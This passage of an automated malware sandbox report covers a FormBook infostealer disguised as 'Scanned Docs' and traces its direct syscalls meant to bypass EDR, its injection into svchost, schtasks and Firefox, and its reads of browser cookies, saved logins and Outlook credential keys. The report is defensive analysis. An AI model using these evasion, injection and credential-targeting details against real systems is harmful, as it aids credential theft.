            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]1_2_03C3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]1_2_03C3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]1_2_03C3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]1_2_03C3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]1_2_03C3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]1_2_03C3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C649D0 mov eax, dword ptr fs:[00000030h]1_2_03C649D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFA9D3 mov eax, dword ptr fs:[00000030h]1_2_03CFA9D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CBE9E0 mov eax, dword ptr fs:[00000030h]1_2_03CBE9E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C629F9 mov eax, dword ptr fs:[00000030h]1_2_03C629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C629F9 mov eax, dword ptr fs:[00000030h]1_2_03C629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h]1_2_03C429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h]1_2_03C429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h]1_2_03C429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h]1_2_03C429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h]1_2_03C429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h]1_2_03C429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h]1_2_03C429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h]1_2_03C429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h]1_2_03C429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h]1_2_03C429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h]1_2_03C429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h]1_2_03C429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h]1_2_03C429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C309AD mov eax, dword ptr fs:[00000030h]1_2_03C309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C309AD mov eax, dword ptr fs:[00000030h]1_2_03C309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB89B3 mov esi, dword ptr fs:[00000030h]1_2_03CB89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB89B3 mov eax, dword ptr fs:[00000030h]1_2_03CB89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB89B3 mov eax, dword ptr fs:[00000030h]1_2_03CB89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB0946 mov eax, dword ptr fs:[00000030h]1_2_03CB0946
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D04940 mov eax, dword ptr fs:[00000030h]1_2_03D04940
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C56962 mov eax, dword ptr fs:[00000030h]1_2_03C56962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C56962 mov eax, dword ptr fs:[00000030h]1_2_03C56962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C56962 mov eax, dword ptr fs:[00000030h]1_2_03C56962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C7096E mov eax, dword ptr fs:[00000030h]1_2_03C7096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C7096E mov edx, dword ptr fs:[00000030h]1_2_03C7096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C7096E mov eax, dword ptr fs:[00000030h]1_2_03C7096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD4978 mov eax, dword ptr fs:[00000030h]1_2_03CD4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD4978 mov eax, dword ptr fs:[00000030h]1_2_03CD4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CBC97C mov eax, dword ptr fs:[00000030h]1_2_03CBC97C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE908 mov eax, dword ptr fs:[00000030h]1_2_03CAE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE908 mov eax, dword ptr fs:[00000030h]1_2_03CAE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CBC912 mov eax, dword ptr fs:[00000030h]1_2_03CBC912
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C28918 mov eax, dword ptr fs:[00000030h]1_2_03C28918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C28918 mov eax, dword ptr fs:[00000030h]1_2_03C28918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB892A mov eax, dword ptr fs:[00000030h]1_2_03CB892A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC892B mov eax, dword ptr fs:[00000030h]1_2_03CC892B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E8C0 mov eax, dword ptr fs:[00000030h]1_2_03C5E8C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D008C0 mov eax, dword ptr fs:[00000030h]1_2_03D008C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFA8E4 mov eax, dword ptr fs:[00000030h]1_2_03CFA8E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6C8F9 mov eax, dword ptr fs:[00000030h]1_2_03C6C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6C8F9 mov eax, dword ptr fs:[00000030h]1_2_03C6C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C30887 mov eax, dword ptr fs:[00000030h]1_2_03C30887
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CBC89D mov eax, dword ptr fs:[00000030h]1_2_03CBC89D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C42840 mov ecx, dword ptr fs:[00000030h]1_2_03C42840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C60854 mov eax, dword ptr fs:[00000030h]1_2_03C60854
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C34859 mov eax, dword ptr fs:[00000030h]1_2_03C34859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C34859 mov eax, dword ptr fs:[00000030h]1_2_03C34859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CBE872 mov eax, dword ptr fs:[00000030h]1_2_03CBE872
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeCode function: 0_2_002E0B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_002E0B62
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeCode function: 0_2_002B2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_002B2622
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeCode function: 0_2_002A083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_002A083F
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeCode function: 0_2_002A09D5 SetUnhandledExceptionFilter,0_2_002A09D5
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeCode function: 0_2_002A0C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_002A0C21

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9CJump to behavior
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exeNtClose: Direct from: 0x76F02B6C
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exeNtAllocateVirtualMemory: Direct from: 0x76F02BECJump to behavior
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exeNtTerminateThread: Direct from: 0x76F02FCCJump to behavior
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exeNtProtectVirtualMemory: Direct from: 0x76EF7B2EJump to behavior
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\schtasks.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: NULL target: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: NULL target: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\schtasks.exeThread register set: target process: 1508Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\schtasks.exeThread APC queued: target process: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exeJump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3135008Jump to behavior
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeCode function: 0_2_002E1201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_002E1201
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeCode function: 0_2_002C2BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_002C2BA5
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeCode function: 0_2_002EB226 SendInput,keybd_event,0_2_002EB226
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeCode function: 0_2_003022DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,0_2_003022DA
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe"Jump to behavior
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\SysWOW64\schtasks.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeCode function: 0_2_002E0B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_002E0B62
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeCode function: 0_2_002E1663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_002E1663
            Source: Scanned Docs from Emnes Metal Sdn Bhd_.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
            Source: Scanned Docs from Emnes Metal Sdn Bhd_.exe, MHFAGZiftf.exe, 00000003.00000000.1874031122.0000000001B31000.00000002.00000001.00040000.00000000.sdmp, MHFAGZiftf.exe, 00000003.00000002.4111597033.0000000001B30000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: MHFAGZiftf.exe, 00000003.00000000.1874031122.0000000001B31000.00000002.00000001.00040000.00000000.sdmp, MHFAGZiftf.exe, 00000003.00000002.4111597033.0000000001B30000.00000002.00000001.00040000.00000000.sdmp, MHFAGZiftf.exe, 00000007.00000000.2021600411.0000000000CD1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: MHFAGZiftf.exe, 00000003.00000000.1874031122.0000000001B31000.00000002.00000001.00040000.00000000.sdmp, MHFAGZiftf.exe, 00000003.00000002.4111597033.0000000001B30000.00000002.00000001.00040000.00000000.sdmp, MHFAGZiftf.exe, 00000007.00000000.2021600411.0000000000CD1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: MHFAGZiftf.exe, 00000003.00000000.1874031122.0000000001B31000.00000002.00000001.00040000.00000000.sdmp, MHFAGZiftf.exe, 00000003.00000002.4111597033.0000000001B30000.00000002.00000001.00040000.00000000.sdmp, MHFAGZiftf.exe, 00000007.00000000.2021600411.0000000000CD1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeCode function: 0_2_002A0698 cpuid 0_2_002A0698
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeCode function: 0_2_002F8195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,0_2_002F8195
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeCode function: 0_2_002DD27A GetUserNameW,0_2_002DD27A
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeCode function: 0_2_002BBB6F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_002BBB6F
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeCode function: 0_2_002842DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_002842DE

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000001.00000002.1950883710.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4110797200.0000000002B10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4111043032.0000000002F90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1951519783.0000000003F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4111935021.0000000003C90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4111848670.0000000003200000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.4113899205.0000000004AE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1951562901.0000000004990000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\schtasks.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\schtasks.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
            Source: Scanned Docs from Emnes Metal Sdn Bhd_.exeBinary or memory string: WIN_81
            Source: Scanned Docs from Emnes Metal Sdn Bhd_.exeBinary or memory string: WIN_XP
            Source: Scanned Docs from Emnes Metal Sdn Bhd_.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
            Source: Scanned Docs from Emnes Metal Sdn Bhd_.exeBinary or memory string: WIN_XPe
            Source: Scanned Docs from Emnes Metal Sdn Bhd_.exeBinary or memory string: WIN_VISTA
            Source: Scanned Docs from Emnes Metal Sdn Bhd_.exeBinary or memory string: WIN_7
            Source: Scanned Docs from Emnes Metal Sdn Bhd_.exeBinary or memory string: WIN_8

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000001.00000002.1950883710.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
